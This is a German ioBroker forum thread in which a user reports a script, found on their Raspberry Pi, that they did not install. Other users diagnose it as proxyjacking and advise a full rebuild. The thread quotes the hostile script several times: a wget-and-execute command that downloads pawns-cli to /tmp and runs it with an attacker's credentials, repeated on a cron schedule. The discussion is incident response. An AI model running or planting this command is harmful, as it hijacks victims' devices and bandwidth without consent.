NEWS
[gelöst]Seltsames Script unter Global
[gelöst]Seltsames Script unter Global
-
Das ist eine PI4. Normale Installation von IOBroker laut hier:
https://forum.iobroker.net/topic/51869/installation-auf-raspi-einfacher-geht-s-nichtDas Script ist nur zu finden wenn Expert Aktiviert ist, sonst ist der Ordner Global nicht zu sehen.
Das System ist neu aufgesetzt und dann das Backup eingespielt. Zwei Tage alt.
Da steckt wohl das hier dahinter: https://pawns.app/
Möchte meinen da wollte oder hat sich jemand meine PI4 leihen wollen.
Wüsste gern ob es gelungen ist und wenn ja wie ich das runter bekomme. -
Hallo
Ich habe hier ein Script unter Global stehen welches ich nicht selber installiert habe.
Wenn ich mir das anschauen, denke ich mir da ist was faul.
Der Inhalt wäre folgendes:exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos'); schedule("10 6 */2 * *", async function () { exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos'); });Das Script habe ich gestoppt. Denke aber mal das da ein Plugin installiert worden sein könnte. Wie könnte ich das finden und wieder löschen? Was sagt ihr?
Unter tmp liegt dann auch so ein Müll welchen ich nicht gelöscht bekomme.
@chemieka Geld verdienen?
https://github.com/IPRoyal/pawns-cli/blob/main/readme.md -
@chemieka Geld verdienen?
https://github.com/IPRoyal/pawns-cli/blob/main/readme.md -
@crunchip
Na das hatte ich auch gefunden. Aber sicher nicht selber drauf gemacht. Das System ist ja nur zwei Tage alt. Über das Backup evtl. wieder draufgekommen?@chemieka na entweder selbst oder du hast ganz andere Probleme, dann solltest du dein Netzwerk mal checken und wer weiß was sonst noch so sein könnte
Portfreigabe für iobroker?
-
@chemieka na entweder selbst oder du hast ganz andere Probleme, dann solltest du dein Netzwerk mal checken und wer weiß was sonst noch so sein könnte
Portfreigabe für iobroker?
@crunchip
Ich nehme an das Script ist schon länger drauf und ist über das Backup wieder drauf gekommen.
Wie könnte ich prüfen ob die Installation durchgeführt wurde?Möchte das nicht ausschließen, dass ich mal einen Port offen hatte in der Vergangenheit aber jetzt auf keinen Fall.
-
Hallo
Ich habe hier ein Script unter Global stehen welches ich nicht selber installiert habe.
Wenn ich mir das anschauen, denke ich mir da ist was faul.
Der Inhalt wäre folgendes:exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos'); schedule("10 6 */2 * *", async function () { exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos'); });Das Script habe ich gestoppt. Denke aber mal das da ein Plugin installiert worden sein könnte. Wie könnte ich das finden und wieder löschen? Was sagt ihr?
Unter tmp liegt dann auch so ein Müll welchen ich nicht gelöscht bekomme.
@chemieka sagte in Seltsames Script unter Global:
device-name=xxxxxxxxxx@io
was auch komisch ist ...das xxxxxxxxxxxxxxXXXXXXXXXXXXXXX
Hast du eine DynDNS Service
EDIT :
DynDNS von @chemieka unkenntlich gemacht
-
@crunchip
Ich nehme an das Script ist schon länger drauf und ist über das Backup wieder drauf gekommen.
Wie könnte ich prüfen ob die Installation durchgeführt wurde?Möchte das nicht ausschließen, dass ich mal einen Port offen hatte in der Vergangenheit aber jetzt auf keinen Fall.
@chemieka ich bin da kein Spezialist für
da steht bisserl Hintergrund info
https://netzpalaver.de/2023/04/12/cyberkriminelle-entdecken-proxyjacking-als-neue-einnahmequelle/ -
@chemieka ich bin da kein Spezialist für
da steht bisserl Hintergrund info
https://netzpalaver.de/2023/04/12/cyberkriminelle-entdecken-proxyjacking-als-neue-einnahmequelle/@crunchip
Der Hintergrund ist mir bekannt bzw. schon gelesen.
Könnte man irgendwie erkennen ob die Installation drauf ist? Seltsam ist auch, die Dateien im Tmp sind vom Anfang Juni. Das System aber zwei Tage alt. Hm.
Ich glaube ich mache nochmal eine neue Karte fertig und schau mal dann. -
@chemieka sagte in Seltsames Script unter Global:
device-name=xxxxxxxxxx@io
was auch komisch ist ...das xxxxxxxxxxxxxxXXXXXXXXXXXXXXX
Hast du eine DynDNS Service
EDIT :
DynDNS von @chemieka unkenntlich gemacht
@glasfaser sagte in Seltsames Script unter Global:
@chemieka sagte in Seltsames Script unter Global:
was auch komisch ist ...das ich auch dein Username ...
Hast du eine DynDNS Service
Was ist hiermit !?
Bist du bei der Telekom . Fritzbox . und hast die IP am Ende mit 06 !?
-
@glasfaser sagte in Seltsames Script unter Global:
@chemieka sagte in Seltsames Script unter Global:
was auch komisch ist ...das ich auch dein Username ...
Hast du eine DynDNS Service
Was ist hiermit !?
Bist du bei der Telekom . Fritzbox . und hast die IP am Ende mit 06 !?
-
@glasfaser
Ja das stimmt schon, werde das mal ändern. Aber ein Port zu IOBroker ist nicht offen. -
@chemieka sagte in Seltsames Script unter Global:
Ja das stimmt schon,
Die DynDNS ist von dir selber oder die IP mit der 06 !?
-
@glasfaser
beides. -
Dann sage doch ... du hast auch gerade dazu den Start Thread bearbeitet , mit xxx
denn ich habe die DynDNS Adresse in meinem Post auch drin !!!
Werde Ihn dazu editieren !!@glasfaser
Ja bitte. System mal neu Aufsetzen. -
Hallo
Ich habe hier ein Script unter Global stehen welches ich nicht selber installiert habe.
Wenn ich mir das anschauen, denke ich mir da ist was faul.
Der Inhalt wäre folgendes:exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos'); schedule("10 6 */2 * *", async function () { exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos'); });Das Script habe ich gestoppt. Denke aber mal das da ein Plugin installiert worden sein könnte. Wie könnte ich das finden und wieder löschen? Was sagt ihr?
Unter tmp liegt dann auch so ein Müll welchen ich nicht gelöscht bekomme.
@chemieka
so ein system ist nicht mehr vertrauenswürdig.
wer weiß was da noch so auf dem system drauf ist oder sich
über so eine anwendung mit drauf gepfriemelt hat.eigentlich bleibt nur noch eins,
alles platt machen
neu aufbauen
ob du dem backup noch vertraust musst du selber überlegen
ich würde es nicht. -
@glasfaser
beides.@chemieka sagte in Seltsames Script unter Global:
@glasfaser
beides.Große Frage ... wie kommt Mister X an deine DynDNS ,
hast du Sie in ioBroker oder wo anderes auch hinterlegt !? -
@chemieka
so ein system ist nicht mehr vertrauenswürdig.
wer weiß was da noch so auf dem system drauf ist oder sich
über so eine anwendung mit drauf gepfriemelt hat.eigentlich bleibt nur noch eins,
alles platt machen
neu aufbauen
ob du dem backup noch vertraust musst du selber überlegen
ich würde es nicht. -
@chemieka sagte in Seltsames Script unter Global:
@glasfaser
beides.Große Frage ... wie kommt Mister X an deine DynDNS ,
hast du Sie in ioBroker oder wo anderes auch hinterlegt !?wer einmal im netz ist, kann ja theoretisch alle rechner erreichen.
wenn auf diesen dann auch eine laxe security existiert, dann ist nix sicher.
nas/samba-freigabe ohne passwort?
windows ohne passwort?
raspberries mit standard login?
nas mit standard login?
etc.als Ergänzung zu meinem obigen post. theoretisch ist das ganze netz verunreinigt.
-
@oliverio
So mache ich das. Das Script lösche ich dann ein Backup machen. Alles neu erstellen.@chemieka sagte in Seltsames Script unter Global:
@oliverio
So mache ich das. Das Script lösche ich dann ein Backup machen. Alles neu erstellen.und du bist sicher, das sich in deinen anderen skripten nix sonstiges verbirgt?
oder in einem der npm module nix eingebaut wurde?
dann bitte alles detailliert vorher begutachten, bevor du iobroker wieder startest.
derjenige der das gemacht hat, hat detailkenntnisse von iobroker.
das ist kein automatisierter angriff, bei denen zu 99% eh alles fehlschlägt, da die systemumgebung nicht passt. -
@chemieka sagte in Seltsames Script unter Global:
@oliverio
So mache ich das. Das Script lösche ich dann ein Backup machen. Alles neu erstellen.und du bist sicher, das sich in deinen anderen skripten nix sonstiges verbirgt?
oder in einem der npm module nix eingebaut wurde?
dann bitte alles detailliert vorher begutachten, bevor du iobroker wieder startest.
derjenige der das gemacht hat, hat detailkenntnisse von iobroker.
das ist kein automatisierter angriff, bei denen zu 99% eh alles fehlschlägt, da die systemumgebung nicht passt.
Support us
150
Online32.4k
Users81.3k
Topics1.3m
Posts